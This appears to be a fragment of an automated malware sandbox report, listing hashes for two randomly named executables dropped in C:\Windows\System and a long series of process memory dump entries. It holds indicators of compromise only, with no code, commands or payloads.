SHA512 99ea3304650953e5907b1ba94c196d47b5e83aa81209186854b91dbc6d59425cd94b430cb36203a11fa85caca1cc00b4bf09fb09f134183acde740725617228f

memory/2824-21-0x00007FF797660000-0x00007FF797A52000-memory.dmp

C:\Windows\System\tCGWtrx.exe

MD5 4e7c77e70ab54fdb525df1e83c14ca6a
SHA1 b3fd5eb82c6064c31e3386bb524a9cec945f72cd
SHA256 e044bbc44a6d4e903a7a86802f17282963ae8194d22b48a2aaecfa30df554c33
SHA512 8addc72767b5480b9cb90032342a18479e863aba615e5b835cfb3625d73f368ae0ee19b4f7059309912d3d404ae04509188f95235b684d2aa8ce8d0878487fe7

C:\Windows\System\diDfwKq.exe

MD5 f5b0b3e8121f9f1870e551e6925bd564
SHA1 c45519cc7f45c273f477434d99eb8a1de1e16921
SHA256 7ed1402a3346d63109e988817c368356975d9e0edb21c09bd0d25172f88c9805
SHA512 15b13ba037146eaf9c52bf756bc818196eaa0ee29bfc691acbf38f15dd72d3774f582f58e5a4b3948311705a341e4b0fef16c8a56d470a19fe853d48516c8951

memory/2824-3709-0x00007FF797660000-0x00007FF797A52000-memory.dmp

memory/2824-3712-0x00007FF797660000-0x00007FF797A52000-memory.dmp

memory/4888-3714-0x00007FF72DA50000-0x00007FF72DE42000-memory.dmp

memory/3192-3716-0x00007FF637990000-0x00007FF637D82000-memory.dmp

memory/884-3718-0x00007FF729710000-0x00007FF729B02000-memory.dmp

memory/1968-3722-0x00007FF7F97F0000-0x00007FF7F9BE2000-memory.dmp

memory/452-3728-0x00007FF6D4FE0000-0x00007FF6D53D2000-memory.dmp

memory/4032-3730-0x00007FF683270000-0x00007FF683662000-memory.dmp

memory/3452-3732-0x00007FF778740000-0x00007FF778B32000-memory.dmp

memory/1668-3734-0x00007FF7B6A40000-0x00007FF7B6E32000-memory.dmp

memory/1200-3726-0x00007FF6C7F00000-0x00007FF6C82F2000-memory.dmp

memory/924-3724-0x00007FF7975B0000-0x00007FF7979A2000-memory.dmp

memory/5020-3720-0x00007FF760E10000-0x00007FF761202000-memory.dmp

memory/4676-3763-0x00007FF6660F0000-0x00007FF6664E2000-memory.dmp

memory/2652-3765-0x00007FF7FC8C0000-0x00007FF7FCCB2000-memory.dmp

memory/680-3761-0x00007FF685600000-0x00007FF6859F2000-memory.dmp

memory/4984-3759-0x00007FF7AB2D0000-0x00007FF7AB6C2000-memory.dmp

memory/5112-3755-0x00007FF621E90000-0x00007FF622282000-memory.dmp

memory/3744-3753-0x00007FF7AF880000-0x00007FF7AFC72000-memory.dmp

memory/2176-3749-0x00007FF7FE7D0000-0x00007FF7FEBC2000-memory.dmp

memory/4296-3745-0x00007FF61D480000-0x00007FF61D872000-memory.dmp

memory/5064-3768-0x00007FF6CFF50000-0x00007FF6D0342000-memory.dmp

memory/4640-3757-0x00007FF65ACC0000-0x00007FF65B0B2000-memory.dmp

memory/3544-3751-0x00007FF60A640000-0x00007FF60AA32000-memory.dmp

memory/4928-3743-0x00007FF6F8810000-0x00007FF6F8C02000-memory.dmp